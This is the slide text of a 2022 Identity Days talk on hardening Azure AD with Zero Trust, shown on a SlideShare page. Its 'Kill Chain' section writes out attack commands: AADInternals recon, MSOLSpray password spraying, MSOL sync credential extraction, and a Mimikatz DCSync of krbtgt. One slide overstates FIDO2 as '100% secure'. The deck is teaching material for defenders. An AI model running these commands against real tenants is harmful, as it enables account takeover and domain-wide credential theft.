SlideShare a Scribd company logo

Appliquez le modèle Zero Trust pour le Hardening de votre Azure AD !

Identity Days
Identity Days

Retrouvez le support de la conférence donnée par Jean-François Apréa & Seyfallah Tagrerout lors des Identity Days 2022.

Technology
1 of 47
Download to read offline
Merci à tous nos partenaires ! 27 octobre 2022 - PARIS @IdentityDays #identitydays2022
Jean-François Apréa CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist MVP Security | MVP Cloud and Datacenter Management (16) Author | Speaker | Trainer (MCT Alumni) Seyfallah Tagrerout CEO and Founder STC Consulting | Cloud and Security Architect Microsoft Azure Specialist | Microsoft Zero Trust Specialist MVP Azure and Enterprise Mobility (8) Author | Speaker | Trainer Apply the Zero Trust model for Hardening your Azure AD 27 octobre 2022 - PARIS
Identity Days 2022 27 octobre 2022 - PARIS Zero Trust? It’s urgent to go, because it’s urgent to be really protected! • Azure AD & Microsoft Entra • Zero Trust and Microsoft vision • Azure AD is Identity and Access Control centric • Azure AD Kill Chain • Azure AD Hardening with Zero Trust in mind 😊 • Good practices and 12-step action plan Agenda
Identity Days 2022 27 octobre 2022 - PARIS It becomes difficult to be up-to-date … Hackers don’t give a shit! Source : Jean-Charles Duret-Ferrari  About your project’s scope…  It’s managed buy a third party…  It’s a legacy system…  It’s too critical to patch…  You’ve always done in that way…  About your Go-Live date…  It’s only a Pilot/POC not production…  About NDA…  It was not a mandatory requirements…  It is a non-exposed internal system…  It is hard to change…  It is handled in the Cloud…  The vendor does not support this…  It is an interim solution…  It is encrypted on disk…  You cannot explain the Risk to the Business…  You have other priorities…  You don’t have a Business justification…  You cannot have ROI…  You contracted out that risk… Really, too many bad reasons!
Azure AD & Microsoft Entra Identity Days 2022 27 octobre 2022 - PARIS
Identity Days 2022 27 octobre 2022 - PARIS Azure Active Directory & Microsoft Entra Azure Active Directory  Identity & Access Management  Inter-connected ecosystem  Security  Hybrid Cloud  Several types of Identities Microsoft Entra • Azure Active Directory • Microsoft Entra Permissions Management • Microsoft Entra Verified ID • Microsoft Entra Workload Identities • Microsoft Entra Identity Governance
Identity Days 2022
About Zero Trust and Microsoft vision Identity Days 2022 27 octobre 2022 - PARIS
Identity Days 2022 27 octobre 2022 - PARIS Verify explicitly Use least privileged access Assume breach Microsoft Zero Trust vision
Identity Days 2022 27 octobre 2022 - PARIS Microsoft Zero Trust vision Assume breach Assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly Transforms overall thinking, strategy, and architectures from “safe network” to “open network” Asset/Node = user, app, device, data, API, etc. Verify explicitly Protect assets against attacker control by explicitly validating that all trust and security decisions use all relevant available information and telemetry Reduces “attack surface” of each asset Use least privilege access Limit access of a potentially compromised asset, typically with just-in-time and just-enough-access (JIT/JEA) and risk- based polices like adaptive access control Reduce blast of compromises
Azure AD is Identity and Access Control centric Identity Days 2022 27 octobre 2022 - PARIS
Identity Days 2022 27 octobre 2022 - PARIS Azure AD Access Control plane Verification of each access attempt Access control to Apps and Data Azure AD signals Never trust, always verify…
Identity Days 2022 27 octobre 2022 - PARIS Azure AD Access Control
Azure AD Kill Chain ✨😯 Identity Days 2022 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Kill Chain How to get started 😊 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Kill Chain Step by step progression 😯 27 octobre 2022 - PARIS 1. Azure AD non-authenticated discovery 2. Search a valid Email account 3. Password Spraying attack 4. Change to User Authenticated session 5. Accounts: List synchronized and cloud accounts 6. Azure AD Connect: Find Sync_Sync01_guid@domain.onmicrosoft.com and AAD Connect VM name in MSOL account 7. Now, by default, all is possible! 8. If you become a local Administrator on AAD Connect, you can extract an encrypted version of MSOL account passwords via the AAD Connect SQL database or directly from LSASS.exe using the MIMICATZ tool! 9. By now, possible to carry out a DCSync attack to replicate all the password hashes of the AD domain! 😯 10. And finally, via Active Directory, exploit the AAD SSO features by recovering the PASSWORD of AZUREADSSOACC$ Otherwise, at this point, it is possible to access the Azure portal, without providing a password So, the Azure AD Connect VM must be super secure
Identity Days 2022 Azure AD Kill Chain Tenant discovery 😯 27 octobre 2022 - PARIS https://login.microsoftonline.com/ getuserrealm.srf?login=[USERNAM E@DOMAIN]&xml=1 😯 1st info available anonymously without authentication😯 😯 1st info available anonymously without authentication😯 About your tenant:  Active or not?  Name?  Federated or not?
Identity Days 2022 Azure AD Kill Chain Tenant discovery 😯 27 octobre 2022 - PARIS Discovery and Reco Azure Tenant Free PowerShell modules to install: GitHub - Gerenios/AADInternals: AADInternals PowerShell module for administering Azure AD and Office 365 Get tenant name, branding and DNS name Get-AADIntLoginInformation -UserName xxxx.domain.onmicrosoft.com Get tenant ID Get-AADIntTenantID -Domain testtenant.onmicrosoft.com Get all additional domains added Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com Get tenant general infos Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com 😯 Third-Party PowerShell modules to find more... 😯 😯 Third-Party PowerShell modules to find more... 😯
Identity Days 2022 Azure AD Kill Chain Initial access + Password Spray / Brut Force 😯 MSOL Spray tool https://github.com/dafthack/MSOLSpray Import-Module MSOLSpray.ps1 Invoke-MSOLSpray -UserList .userlist.txt -Password IdentityDays$Paris%2022 Basic sample passwords files are available here: https://github.com/ohmybahgosh/RockYou2021.txt 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Kill Chain MFA Attack + MFA Fatigue😯 27 octobre 2022 - PARIS Phishing & Man in the middle https://veruscorp.com/mfa- fatigue-leads-to-breach-of- ubers-corporate-systems/ 27/09/2022 MFA Fatigue leads to breach UBER’S Corporate users https://github.com/kgretzky/evilginx Using FIDO2 hardware keys like YubiKey provides 100% secure MFA
Identity Days 2022 Azure AD Kill Chain Enumeration😯 27 octobre 2022 - PARIS AzureAD PowerShell Module PowerShell Gallery | AzureAD 2.0.2.140 Install-module –Name AzureAD With standard user but without special privileges! Connect-AzureAD Session state and details Get-AzureADCurrentSessionInfo Tenant details Get-AzureADTenantDetail List all AAD users Get-AzureADUser -All $true Get specific user properties Get-AzureADUser -ObjectId test@tenanttest.onmicrosoft.com Get username with “Admin’’ string” Get-AzureADUser -SearchString "admin" Get all groups with Admin string Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} Get all synchronized groups from AD to AAD Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null} Get all Azure AD groups Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null} Get all users with Global Administrator role Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember Get all Intune managed devices Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"} Get all registered Apps Get-AzureADApplication -All $true Other useful tools:  Via Azure portal  Via PowerShell  Via Azure CLI  Access the list of all users, groups, applications, devices, roles, subscriptions  Send invitations to Guest type accounts  Create security groups  Read group members  Create a new app  Add up to 50 Azure AD devices Warning: By default, an AAD user can 😯
Identity Days 2022 Azure AD Kill Chain And finally, use of MSOL_* credentials😯 Enumeration via AD PowerShell module Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl Enumeration via Azure AD PowerShell module Get-AzureADUser -All $true | ?{$_.userPrincipalName - match "Sync_"} Once the AAD Connect has been analyzed, the credentials are extracted Get-AADIntSyncCredentials 27 octobre 2022 - PARIS The end: MSOL_*account credential + DCSync attack with MIMIKATZ runas /netonly /user:amslab.corpMSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLabkrbtgt /domain:amsLab.corp /dc:DC01.amsLab.corp"
Azure AD Hardening ✨👍 Identity Days 2022 27 octobre 2022 - PARIS
Identity Days 2022 27 octobre 2022 - PARIS Azure AD Hardening Inspired by Microsoft Entra Based on customer Experience  Security projects  Assessment / audit missions  Emergency operations  Remediation
Identity Days 2022 27 octobre 2022 - PARIS Azure AD Hardening Always start with Azure AD Quick Wins 👍 Based on customer Experience  Security projects  Assessment / audit missions  Emergency operations  Remediation
Identity Days 2022 Azure AD Hardening Always start with Azure AD Quick Wins 👍
Identity Days 2022 Azure AD Hardening Part1: Enforce your Secrets 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part1: Enforce your Secrets 1. Use Microsoft Secured Score  Deploy MFA for EVERYONE  Enable Identity Protection (P2) 2. Use Azure AD Smart Lockout  For Azure AD cloud accounts  For hybrid accounts 3. Deploy Passwordless authentication  FIDO2 Key  Microsoft Authenticator 4. Create TWO recovery accounts  Only in Azure AD  Do not enable synchronization  Do not use MFA  Do not use FIDO2 keys  Disable password expiration  Activate a strong audit on these two accounts with:  Azure Log Analytics  Azure Sentinel  Cloud App Security (MCAS) 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part1: Hardening Azure MFA 1. MFA Protection 2. Auth Strengths 3. MFA Fraud alert 4. Identity Protection 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part2: Conditional Access Design Scope audience  Regular users  High Privilege Users  Guest / External Users  Workload identities Logical separation in AAD:  Flexibility  Granularity  Lower risk of error  More “readability”  Troubleshooting  Governance 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part2: Conditional Access Design Best Practices  Always test behavior  What if?  Report-only mode Area Description Authentication Policies - Enforce MFA for All administrators - Enforce MFA for all standard user - Enforce MFA for all Guest users - Block Legacy authentication - Reduce attack surface Device Access Policies - Block unsupported device platform - Require managed devices (endpoint Manager) – Admin station - Require approved app for mobile access (MAM) - Require managed devices - Specific conditional access for Mac Os (if needed) Strict Security Policies - Block MFA registration from untrusted location - Require Term of use for: All Administrator / Guest Access / Consultants - Control Sign-in Frequency - Disable persistent browser - Block foreign locations - Require trusted location for all admins - User Risk-based and Sign-in Risk based (via Identity Protection) - Authentication context  PIM / MIP labeled SharePoint site / Cloud app security upload and download - Privileged access via filters for Devices - Conditional Access for workload identities - Block all cloud app except ( Teams / SPO) for Guest Access 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part3: Use PIM Privileged Identity Management (Azure AD P2) PIM Best Practices  Enable PIM for privileged accounts  Enable PIM for all admin roles (Zero Trust)  Configure each role with MFA  For a Global Admin account, grant 2H max (Zero Trust)  Think about the default duration: Permanent for partners  Configure email notifications to track usage  Configure Access Reviews for PIM every week  Activate the Privileged Access group 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part4: Use Microsoft Defender for Identity Why use Microsoft Defender for Identity?  Hyperscale SaaS protection in Azure  Defender for Cloud App integration  Multi-forest support  Detection of DC Shadow  Continuous updates in SaaS mode  ATA Sensor & ATA Sensor Standalone  Included with EMS E5, M365 E5 and M365 Security E5 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part5: Identity Governance – Use new Defender for Identity workflows Create user account (status: disabled) Launch custom Logic Apps workflow Send email to hiring manager with TAP Group assignments Send welcome email to new hire Send email to onboarding DL Generate Temporary Access Pass (TAP) Start date Enable user account Add user to Teams “New Hires” channel 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part6: Management of externals Identities and Collaboration 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part6: Externals Identities and new Cross-tenant feature New Cross-tenant feature best practices  Use case 1: Configure B2B Collaboration  Use case 2: Configure B2B Direct Connect  Configure Inbound in Granular Mode with MFA + Trust Compliance Device Claims  Configure Outbound with granularity and scope your groups  Block all B2B collaboration Outbound by default  Use the Shared Channel 27 octobre 2022 - PARIS
Identity Days 2022 ID Action Impact 01 Dedicated Condtional Access for MFA Medium 02 Dynamic group included all External / Guest users Low 03 CA Hardering : Block all cloud app except ( Teams / SPO) High 04 CA Term of use Medium 05 Restriction – Prevent download - Web only Access for sensitive Teams / SharePoint site High 06 Session timeout ( daily MFA/ Authentication) High 07 Access review for guest accounts Medium 08 Sensitivity Label for M365 groups ( Teams and sharepoint Online) High 09 Dedicated audit log for Guest / External user access High Azure AD Hardening Part7: Protect yourself against Guest and External users with 9 control points 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part8: Protect your Workload Identities of workloads can access Sensitive Data and Assets Source: SCIM Quarterly Analysis, July 7th, 2022 68% Source: Microsoft Security internal research 2021 Human identities Machine identities About 5 machine IDs for 1 human ID 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part8: Protect your Workload Identities Human identities Machine identities Future: about 20 machine IDs for 1 human ID  1: Deploy Access Review for SPNs  2: configure CAs for workload identities  3: Deploy AAD Identity Protection  4: Set up the User Consent Workflow  5: Audit and log with Defender for Cloud app / Azure Sentinel 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part9: Management of Externals Identities and collaboration 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part10: to go beyond… User Access Strategy  User admin ( Cloud Only)  PIM avec les droits nécessaires  Global Admin. : 2h  Other: 4 h  MFA / Passwordless FIDO2  Conditional Access:  Scope User Admins  Exclude: Break Glace accounts  Device : Windows  Emplacement: Trusted Location  Approve : Require Device to be marked as compliant  Identity protection  Sign-in Risk  User risk  Password Protection Privileged Access Workstation  Azure AD Autopilot profile  Compliance with Endpoint Manager  Security & Hardening Device Profile  Safety Baseline  Deny BYOD  Windows Update setup  Defender for Endpoint - Integration with Endpoint Manager 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part11: The tomorrow model... Enterprise Access model  Tier0  Access Control Plane  Management  Tier1  Management Plan  Data management  Application  Tier2  User access  Application access (API, …) 27 octobre 2022 - PARIS
Identity Days 2022 Azure AD Hardening Part12: SecOps A SecOps implementation is essential  Management of unified alerts  Management of unified Incident  Log Management / Redirection  Proactivity  Automatic playbook trigger via Sentinel (remember to add Azure AD Data Connectors)  Remember to have a real Detection / Hunting and Response strategy  Don't Forget “Hunting” with KQL  Use Microsoft 365 Defender “Admin Center” 27 octobre 2022 - PARIS
Conclusion Identity Days 2022 27 octobre 2022 - PARIS
Zero Trust smooth deployment in 12 steps Think Hybrid and protect your On-Premise Active Directory environment! 1. Use Azure AD as your IAM 2. Manage Identity and Access 3. Provision users 4. Control All Authentications 5. Implement strong and secure Auths 6. Evaluate Authentications and Credentials 8. Determine Resource Access 7. Determine Trusted Zones 9. Apply minimum privileges 10. Secure administrative rights 11. Take advantage of Conditional Access 12. Train continuously! Modernize Identity and device management Consolidation then legacy infrastructure cleanup Configure secure access for all types of users Secure your hybrid environment Strong authentications, conditional access and intelligent strategies Secure experience for all users
Identity Days 2021 Microsoft Documentation! Zero Trust Document Center https://docs.microsoft.com/en-us/security/zero-trust/ Monitor your Azure AD Secure Score https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity- secure-score Integrate your Apps into Azure AD https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an- application-integration Enable PHS and do not use PTA or ADFS federation Enable Seamless SSO and minimize the use of ADFS On-Premise Azure MFA + Passwordless avec FIDO2 (Yubico, …) Use PIM for IT teams Use Azure AD Identity Protection for Everyone Privileged Accounts | backup accounts | MFA | Passwordless Security Update Guide: Patch and patch again! https://msrc.microsoft.com/update-guide/ Conditional Access MFA for Guests MFA for Everyone Access policies and trusted locations Test | What If? Reports - SecOps Devices Azure AD logs (Sign-ins and applications) Users at risk: logins, locations, IP, GPS, Cloud App Security Azure Sentinel Passwords SSPR Smart Lockout Azure AD / Active Directory Password Protection Education & Communication with Users Internal training / Cyber best practices Finally, our Zero Trust “To-do list”
Merci à tous nos partenaires ! 27 octobre 2022 - PARIS @IdentityDays #identitydays2022 Merci à tous ✨👍

Recommended

Gestion des identités : par où commencer ?
Gestion des identités : par où commencer ?Gestion des identités : par où commencer ?
Gestion des identités : par où commencer ?Identity Days
 
Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Identity Days
 
Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...
Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...
Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...Identity Days
 
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...Identity Days
 
Identity access management
Identity access managementIdentity access management
Identity access managementProf. Jacques Folon (Ph.D)
 
IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15
IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15
IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15OpenID Foundation Japan
 
Comment hacker Active Directory de A à Z? - Par Sylvain Cortès
Comment hacker Active Directory de A à Z? - Par Sylvain CortèsComment hacker Active Directory de A à Z? - Par Sylvain Cortès
Comment hacker Active Directory de A à Z? - Par Sylvain CortèsIdentity Days
 
Modes de raccordement SSO et utilisations avancées de LemonLDAP::NG
Modes de raccordement SSO et utilisations avancées de LemonLDAP::NGModes de raccordement SSO et utilisations avancées de LemonLDAP::NG
Modes de raccordement SSO et utilisations avancées de LemonLDAP::NGIdentity Days
 

Recommended

Gestion des identités : par où commencer ?
Gestion des identités : par où commencer ?Gestion des identités : par où commencer ?
Gestion des identités : par où commencer ?Identity Days
 
Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Identity Days
 
Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...
Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...
Réussir son projet de sécurisation des Identités en 5 commandements (parce qu...Identity Days
 
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...Identity Days
 
Identity access management
Identity access managementIdentity access management
Identity access managementProf. Jacques Folon (Ph.D)
 
IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15
IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15
IDA,VC,DID関連仕様 最新情報 - OpenID BizDay #15OpenID Foundation Japan
 
Comment hacker Active Directory de A à Z? - Par Sylvain Cortès
Comment hacker Active Directory de A à Z? - Par Sylvain CortèsComment hacker Active Directory de A à Z? - Par Sylvain Cortès
Comment hacker Active Directory de A à Z? - Par Sylvain CortèsIdentity Days
 
Modes de raccordement SSO et utilisations avancées de LemonLDAP::NG
Modes de raccordement SSO et utilisations avancées de LemonLDAP::NGModes de raccordement SSO et utilisations avancées de LemonLDAP::NG
Modes de raccordement SSO et utilisations avancées de LemonLDAP::NGIdentity Days
 
Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...
Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...
Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...Identity Days
 
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Identity Days
 
クラウドにおける Windows Azure Active Directory の役割
クラウドにおける Windows Azure Active Directory の役割クラウドにおける Windows Azure Active Directory の役割
クラウドにおける Windows Azure Active Directory の役割junichi anno
 
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?Identity Days
 
Identity and Access Management (IAM): Benefits and Best Practices 
Identity and Access Management (IAM): Benefits and Best Practices Identity and Access Management (IAM): Benefits and Best Practices 
Identity and Access Management (IAM): Benefits and Best Practices Veritis Group, Inc
 
OpenID for Verifiable Credentials
OpenID for Verifiable CredentialsOpenID for Verifiable Credentials
OpenID for Verifiable CredentialsTorsten Lodderstedt
 
Les Outils de la CSA (Cloud Security Alliance)
Les Outils de la CSA (Cloud Security Alliance)Les Outils de la CSA (Cloud Security Alliance)
Les Outils de la CSA (Cloud Security Alliance)Yann Riviere CCSK, CISSP, CRISC, CISM
 
Azure conditional access
Azure conditional accessAzure conditional access
Azure conditional accessTad Yoke
 
OpenID for SSI
OpenID for SSIOpenID for SSI
OpenID for SSITorsten Lodderstedt
 
OpenID for Verifiable Credentials
OpenID for Verifiable CredentialsOpenID for Verifiable Credentials
OpenID for Verifiable CredentialsTorsten Lodderstedt
 
Azure privatelink
Azure privatelinkAzure privatelink
Azure privatelinkUdaiappa Ramachandran
 
OpenID Connect 4 SSI
OpenID Connect 4 SSIOpenID Connect 4 SSI
OpenID Connect 4 SSITorsten Lodderstedt
 
Verifiable Credentials in Self-Sovereign Identity (SSI)
Verifiable Credentials in Self-Sovereign Identity (SSI)Verifiable Credentials in Self-Sovereign Identity (SSI)
Verifiable Credentials in Self-Sovereign Identity (SSI)Evernym
 
AZURE - GUIA PRÁCTICA 01.pdf
AZURE - GUIA PRÁCTICA 01.pdfAZURE - GUIA PRÁCTICA 01.pdf
AZURE - GUIA PRÁCTICA 01.pdfMiguelAngelTorres75
 
認証から見たリモート署名 ー利用認証と鍵認可ー
認証から見たリモート署名 ー利用認証と鍵認可ー認証から見たリモート署名 ー利用認証と鍵認可ー
認証から見たリモート署名 ー利用認証と鍵認可ーNaoto Miyachi
 
Introduction to Incident Response on AWS
Introduction to Incident Response on AWSIntroduction to Incident Response on AWS
Introduction to Incident Response on AWSAmazon Web Services
 
Blockchain privacy approaches in hyperledger indy
Blockchain privacy approaches in hyperledger indyBlockchain privacy approaches in hyperledger indy
Blockchain privacy approaches in hyperledger indyManishKumarGiri2
 
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop Self-issued OpenID Provider_OpenID Foundation Virtual Workshop
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop Kristina Yasuda
 
OpenID Connect for W3C Verifiable Credential Objects
OpenID Connect for W3C Verifiable Credential ObjectsOpenID Connect for W3C Verifiable Credential Objects
OpenID Connect for W3C Verifiable Credential ObjectsTorsten Lodderstedt
 
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...MIM Synchronization Services 2016 -> une solution économique pour créer, modi...
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...Identity Days
 
IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud MicrosoftIdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud MicrosoftIdentity Days
 
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...Identity Days
 

More Related Content

What's hot

Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...
Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...
Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...Identity Days
 
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Identity Days
 
クラウドにおける Windows Azure Active Directory の役割
クラウドにおける Windows Azure Active Directory の役割クラウドにおける Windows Azure Active Directory の役割
クラウドにおける Windows Azure Active Directory の役割junichi anno
 
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?Identity Days
 
Identity and Access Management (IAM): Benefits and Best Practices 
Identity and Access Management (IAM): Benefits and Best Practices Identity and Access Management (IAM): Benefits and Best Practices 
Identity and Access Management (IAM): Benefits and Best Practices Veritis Group, Inc
 
OpenID for Verifiable Credentials
OpenID for Verifiable CredentialsOpenID for Verifiable Credentials
OpenID for Verifiable CredentialsTorsten Lodderstedt
 
Azure conditional access
Azure conditional accessAzure conditional access
Azure conditional accessTad Yoke
 
OpenID for Verifiable Credentials
OpenID for Verifiable CredentialsOpenID for Verifiable Credentials
OpenID for Verifiable CredentialsTorsten Lodderstedt
 
Verifiable Credentials in Self-Sovereign Identity (SSI)
Verifiable Credentials in Self-Sovereign Identity (SSI)Verifiable Credentials in Self-Sovereign Identity (SSI)
Verifiable Credentials in Self-Sovereign Identity (SSI)Evernym
 
認証から見たリモート署名 ー利用認証と鍵認可ー
認証から見たリモート署名 ー利用認証と鍵認可ー認証から見たリモート署名 ー利用認証と鍵認可ー
認証から見たリモート署名 ー利用認証と鍵認可ーNaoto Miyachi
 
Introduction to Incident Response on AWS
Introduction to Incident Response on AWSIntroduction to Incident Response on AWS
Introduction to Incident Response on AWSAmazon Web Services
 
Blockchain privacy approaches in hyperledger indy
Blockchain privacy approaches in hyperledger indyBlockchain privacy approaches in hyperledger indy
Blockchain privacy approaches in hyperledger indyManishKumarGiri2
 
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop Self-issued OpenID Provider_OpenID Foundation Virtual Workshop
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop Kristina Yasuda
 
OpenID Connect for W3C Verifiable Credential Objects
OpenID Connect for W3C Verifiable Credential ObjectsOpenID Connect for W3C Verifiable Credential Objects
OpenID Connect for W3C Verifiable Credential ObjectsTorsten Lodderstedt
 
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...MIM Synchronization Services 2016 -> une solution économique pour créer, modi...
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...Identity Days
 

What's hot (20)

Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...
Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...
Identity Days 2020 - Mettre en oeuvre AD-CS en respectant les meilleures prat...
 
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
 
クラウドにおける Windows Azure Active Directory の役割
クラウドにおける Windows Azure Active Directory の役割クラウドにおける Windows Azure Active Directory の役割
クラウドにおける Windows Azure Active Directory の役割
 
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
 
Identity and Access Management (IAM): Benefits and Best Practices 
Identity and Access Management (IAM): Benefits and Best Practices Identity and Access Management (IAM): Benefits and Best Practices 
Identity and Access Management (IAM): Benefits and Best Practices 
 
OpenID for Verifiable Credentials
OpenID for Verifiable CredentialsOpenID for Verifiable Credentials
OpenID for Verifiable Credentials
 
Les Outils de la CSA (Cloud Security Alliance)
Les Outils de la CSA (Cloud Security Alliance)Les Outils de la CSA (Cloud Security Alliance)
Les Outils de la CSA (Cloud Security Alliance)
 
Azure conditional access
Azure conditional accessAzure conditional access
Azure conditional access
 
OpenID for SSI
OpenID for SSIOpenID for SSI
OpenID for SSI
 
OpenID for Verifiable Credentials
OpenID for Verifiable CredentialsOpenID for Verifiable Credentials
OpenID for Verifiable Credentials
 
Azure privatelink
Azure privatelinkAzure privatelink
Azure privatelink
 
OpenID Connect 4 SSI
OpenID Connect 4 SSIOpenID Connect 4 SSI
OpenID Connect 4 SSI
 
Verifiable Credentials in Self-Sovereign Identity (SSI)
Verifiable Credentials in Self-Sovereign Identity (SSI)Verifiable Credentials in Self-Sovereign Identity (SSI)
Verifiable Credentials in Self-Sovereign Identity (SSI)
 
AZURE - GUIA PRÁCTICA 01.pdf
AZURE - GUIA PRÁCTICA 01.pdfAZURE - GUIA PRÁCTICA 01.pdf
AZURE - GUIA PRÁCTICA 01.pdf
 
認証から見たリモート署名 ー利用認証と鍵認可ー
認証から見たリモート署名 ー利用認証と鍵認可ー認証から見たリモート署名 ー利用認証と鍵認可ー
認証から見たリモート署名 ー利用認証と鍵認可ー
 
Introduction to Incident Response on AWS
Introduction to Incident Response on AWSIntroduction to Incident Response on AWS
Introduction to Incident Response on AWS
 
Blockchain privacy approaches in hyperledger indy
Blockchain privacy approaches in hyperledger indyBlockchain privacy approaches in hyperledger indy
Blockchain privacy approaches in hyperledger indy
 
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop
